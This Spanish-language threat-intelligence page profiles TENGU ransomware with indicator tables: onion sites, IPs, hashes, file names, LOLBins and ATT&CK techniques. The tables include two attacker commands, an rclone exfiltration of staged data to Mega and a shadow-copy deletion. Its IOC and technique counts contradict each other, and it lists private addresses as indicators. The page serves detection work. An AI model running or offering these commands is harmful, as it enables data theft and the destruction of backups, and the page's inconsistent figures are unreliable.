jordiserrano.meClickFixKAIROSIntelTracker
Panel de inteligencia » TENGU Ransomware: IOC Intelligence Report 2026

TENGU Ransomware: IOC Intelligence Report 2026

Ransomware 3 min lectura tengu
Fecha
18 Jun 2026
Actor
tengu
Tipo
Ransomware
Pais
Unknown
Sector
-
Confianza
high
100
Prioridad analitica
Alta

Basado en actor, pais, IOCs, TTPs, filtracion y calidad de contexto.

30IOCs
8TTPs
tenguActor
UnknownPais
Executive Summary
Artefactos identificados asociados a TENGU Ransomware (TenguLocker / TenguRaaS). Esta operacion de ransomware como servicio opera mediante sitios .onion, utiliza herramientas como ScreenConnect y WinSCP para acceso remoto, emplea LOLBins nativos de Windows para evasion, y exfiltra datos via rclone hacia Mega.nz.

Key Points

  • Contacto: [email protected] / [email protected]
  • Twitter/X: @TenguRaaS
  • Modo: Ransomware-as-a-Service (RaaS)
  • Exfiltracion: rclone -> Mega.nz
  • Herramientas: ScreenConnect, WinSCP, rclone

Resumen

Artefactos identificados asociados a TENGU Ransomware (TenguLocker / TenguRaaS). Esta operacion de ransomware como servicio opera mediante sitios .onion, utiliza herramientas como ScreenConnect y WinSCP para acceso remoto, emplea LOLBins nativos de Windows para evasion, y exfiltra datos via rclone hacia Mega.nz.

Datos clave

Indicadores de Compromiso (IOCs)

Tabla con 141 artefactos identificados de diversa naturaleza: comandos, CVE, dominios onion, IPs, hashes, emails, ficheros, LOLBins, rutas, registro, herramientas y tecnicas MITRE ATT&CK.

TipoValorContexto
COMMANDrclone copy C:\Staging\Data mega_remote:Exfiltrated_Data --bwlimit 5M -qTENGU
COMMANDvssadmin delete shadows /all /quietTENGU
CVECVE-2020-1472TENGU
CVECVE-2026-23477TENGU
CVECVE-2025-43995TENGU
CVECVE-2024-38178TENGU
CVECVE-2025-55754TENGU
CVECVE-2026-20253TENGU
DOMAINfuvodyoktsjdwu3mrbbrmdsmtblkxau6l7r5dygfwgzhf36mabjtcjad.onionTENGU
DOMAINlongcc4fqrfcqt5lzceutylaxir6h66fp6df3oin6mvwvz6pfdbxc6qd.onionTENGU
DOMAINlongejh5gj5igfinj36rmqt2ydx2vun6zmditi3ij6hebawnn4xucqad.onionTENGU
DOMAINlongf6faa6tiudn5n6ar77z5balign2cxo2tjfsxuf6wnlzjamqew2yd.onionTENGU
DOMAINlonghbqhzlv3p7tvx3iwhfizkmtkm2nhnlbw5d4qr65wjz5e6aa23mid.onionTENGU
DOMAINlongjr5sl6a57ajn52nysmvgobmb7lktjthssmt2jeyjagk3rw36djyd.onionTENGU
DOMAINlongvqprqrb4zbxooswz4upefhtikhnyqv4gw4fkzpkc2wjpvxsucwid.onionTENGU
DOMAINhowdkesnbd7yh7r7h7uns4yylu6cjxs4tus64foquq5a2bzml2ur6uqd.onionTENGU
DOMAINwww.torproject.orgTENGU
DOMAINshisha.tenguTENGU
DOMAINMega.nzTENGU
EMAIL[email protected]TENGU
EMAIL[email protected]TENGU
FILErand.README.txtTENGU
FILEwraithnet_bot.exeTENGU
FILEcontroller_gui.exeTENGU
FILEcontroller_console.exeTENGU
FILEREADME.txtTENGU
FILEwraithnet.logTENGU
FILE8F2Z-README.txtTENGU
FILETENGU.README.txtTENGU
FILETENGU_README.txtTENGU
HASHFAFB6C5E12DFEEFABA5AC8982D5BB13DD206CFCD328B9D36AA87257F762EE24ATENGU
HASHDFBC9412BE99B25137AB6AB575489A93TENGU
HASH62c6ba7f5356663c46b8918b6a0994fcTENGU
HASHb400c58e7e227361cc689078ce9163c4TENGU
HASH3b18e9da970fa7d336b08c5df04668b7TENGU
HASH511a4780cbd9ed2280b432afc6cbfd1aTENGU
HASHb8c81e1e17adcaf9e84d76401697b7e5TENGU
HASH7ac4f264f595e15f77025527994b74e5TENGU
IP110.227.205.232TENGU
IP123.255.248.97TENGU
IP94.26.88.100TENGU
IP94.26.88.101TENGU
IP94.26.88.102TENGU
IP117.240.9.147TENGU
IP206.168.81.33TENGU
IP61.0.226.126TENGU
IP149.88.72.63TENGU
IP194.165.16.164TENGU
IP194.165.16.167TENGU
IP45.227.254.156TENGU
IP88.214.25.125TENGU
IP91.238.181.93TENGU
IP91.238.181.95TENGU
IP94.26.88.103TENGU
IP117.239.53.213TENGU
IP117.244.244.52TENGU
IP192.168.1.3TENGU
IP103.80.211.131TENGU
IP117.250.6.65TENGU
IP122.129.85.250TENGU
IP185.11.61.27TENGU
IP192.168.1.106TENGU
IP192.168.1.75TENGU
IP194.165.16.161TENGU
IP194.165.16.163TENGU
IP45.227.254.151TENGU
IP45.227.254.152TENGU
IP45.227.254.153TENGU
IP49.51.142.252TENGU
IP71.6.134.232TENGU
IP88.214.25.121TENGU
IP91.238.181.96TENGU
LOLBINrundll32.exeTENGU
LOLBINpowershell.exeTENGU
LOLBINcmd.exeTENGU
LOLBINschtasks.exeTENGU
LOLBINsc.exeTENGU
LOLBINwevtutilTENGU
LOLBINvssadminTENGU
LOLBINrcloneTENGU
MITRET1078TENGU
MITRET1190TENGU
MITRET1490TENGU
MITRET1486TENGU
MITRET1567TENGU
MITRET1041TENGU
MITRET1070TENGU
MITRET1218TENGU
MITRET1046TENGU
MITRET1133TENGU
MITRET1566TENGU
MITRET1059TENGU
MITRET1562TENGU
MITRET1074TENGU
MITRET1547.001TENGU
MITRET1003TENGU
MITRET1555TENGU
MITRET1018TENGU
MITRET1021TENGU
MITRET1059.001TENGU
MITRET1059.003TENGU
MITRET1566.002TENGU
MITRET1068TENGU
MITRET1021.001TENGU
MITRET1039TENGU
MITRET1552TENGU
MITRET1005TENGU
MITRET1565TENGU
MITRET1567.002TENGU
MITRET1218.011TENGU
MITRET1003.001TENGU
MITRET1562.001TENGU
MITRET1070.001TENGU
MITRET1595.002TENGU
MITRET1219TENGU
MITRET1078.002TENGU
MITRET1110.001TENGU
MITRET1110.003TENGU
MITRET1087.002TENGU
MITRET1021.002TENGU

Tecnicas MITRE ATT&CK

Se identificaron mas de 30 tecnicas MITRE incluyendo T1078 (Valid Accounts), T1190 (Exploit Public-Facing App), T1486 (Data Encrypted for Impact), T1041 (Exfiltration Over C2), T1562 (Impair Defenses), T1567 (Exfiltration Over Web Service), T1070 (Indicator Removal), T1218 (Signed Binary Proxy Execution), T1003 (OS Credential Dumping), T1490 (Inhibit System Recovery), entre otras.

Referencias

Diamond Model

Adversary
tengu
Ver perfil →
Victim
TENGU Ransomware Intelligence
Capability
Ransomware
8 TTPs MITRE
Infrastructure
fuvodyoktsjdwu3mrbbrmdsmtblkxau6l7r5dygfwgzhf36mabjtcjad.onion
longcc4fqrfcqt5lzceutylaxir6h66fp6df3oin6mvwvz6pfdbxc6qd.onion
longejh5gj5igfinj36rmqt2ydx2vun6zmditi3ij6hebawnn4xucqad.onion
longf6faa6tiudn5n6ar77z5balign2cxo2tjfsxuf6wnlzjamqew2yd.onion

Indicadores de Compromiso (IOCs)

TipoValorContextoOSINT
COMMAND rclone copy C:\Staging\Data mega_remote:Exfiltrated_Data --bwlimit 5M -q TENGU VT OffSec SOCRadar
COMMAND vssadmin delete shadows /all /quiet TENGU VT OffSec SOCRadar
CVE CVE-2020-1472 TENGU VT OffSec SOCRadar
CVE CVE-2026-23477 TENGU VT OffSec SOCRadar
CVE CVE-2025-43995 TENGU VT OffSec SOCRadar
CVE CVE-2024-38178 TENGU VT OffSec SOCRadar
CVE CVE-2025-55754 TENGU VT OffSec SOCRadar
CVE CVE-2026-20253 TENGU VT OffSec SOCRadar
DOMAIN fuvodyoktsjdwu3mrbbrmdsmtblkxau6l7r5dygfwgzhf36mabjtcjad.onion TENGU VT OffSec SOCRadar
DOMAIN longcc4fqrfcqt5lzceutylaxir6h66fp6df3oin6mvwvz6pfdbxc6qd.onion TENGU VT OffSec SOCRadar
DOMAIN longejh5gj5igfinj36rmqt2ydx2vun6zmditi3ij6hebawnn4xucqad.onion TENGU VT OffSec SOCRadar
DOMAIN longf6faa6tiudn5n6ar77z5balign2cxo2tjfsxuf6wnlzjamqew2yd.onion TENGU VT OffSec SOCRadar
DOMAIN longhbqhzlv3p7tvx3iwhfizkmtkm2nhnlbw5d4qr65wjz5e6aa23mid.onion TENGU VT OffSec SOCRadar
DOMAIN longjr5sl6a57ajn52nysmvgobmb7lktjthssmt2jeyjagk3rw36djyd.onion TENGU VT OffSec SOCRadar
DOMAIN longvqprqrb4zbxooswz4upefhtikhnyqv4gw4fkzpkc2wjpvxsucwid.onion TENGU VT OffSec SOCRadar
DOMAIN howdkesnbd7yh7r7h7uns4yylu6cjxs4tus64foquq5a2bzml2ur6uqd.onion TENGU VT OffSec SOCRadar
DOMAIN www.torproject.org TENGU VT OffSec SOCRadar
DOMAIN shisha.tengu TENGU VT OffSec SOCRadar
DOMAIN Mega.nz TENGU VT OffSec SOCRadar
EMAIL [email protected] TENGU VT OffSec SOCRadar
EMAIL [email protected] TENGU VT OffSec SOCRadar
FILE rand.README.txt TENGU VT OffSec SOCRadar
FILE wraithnet_bot.exe TENGU VT OffSec SOCRadar
FILE controller_gui.exe TENGU VT OffSec SOCRadar
FILE controller_console.exe TENGU VT OffSec SOCRadar
FILE README.txt TENGU VT OffSec SOCRadar
FILE wraithnet.log TENGU VT OffSec SOCRadar
FILE 8F2Z-README.txt TENGU VT OffSec SOCRadar
FILE TENGU.README.txt TENGU VT OffSec SOCRadar
FILE TENGU_README.txt TENGU VT OffSec SOCRadar

Referencias y enlaces

→ Perfil del actor tengu en el blog → Ver tengu en IntelTracker → URL IntelTracker: x.com→ URL IntelTracker: ransomlook.io→ URL IntelTracker: github.com → Fuente OSINT: x.com→ Fuente OSINT: ransomlook.io→ Fuente OSINT: github.com → Buscar tengu en APTTrail → Repositorio APTTrail → Buscar en Google News → Analizar en VirusTotal → Feed RSS del blog
← Volver al panel de inteligencia

Incidentes recientes

Suǭrez&Clavera18 Jun 2026 · gunra MHE9 Logstica Ltda18 Jun 2026 · gunra Misericrdia de Santo Tirso18 Jun 2026 · qilin Direǜo Estacionamentos S.A.18 Jun 2026 · deadlock Br Cargolift Polska Sp. z o.o.18 Jun 2026 · deadlock www.someco.com18 Jun 2026 · lynx www.eastersealsia.org18 Jun 2026 · lynx Vera Chimie Management18 Jun 2026 · the-gentlemen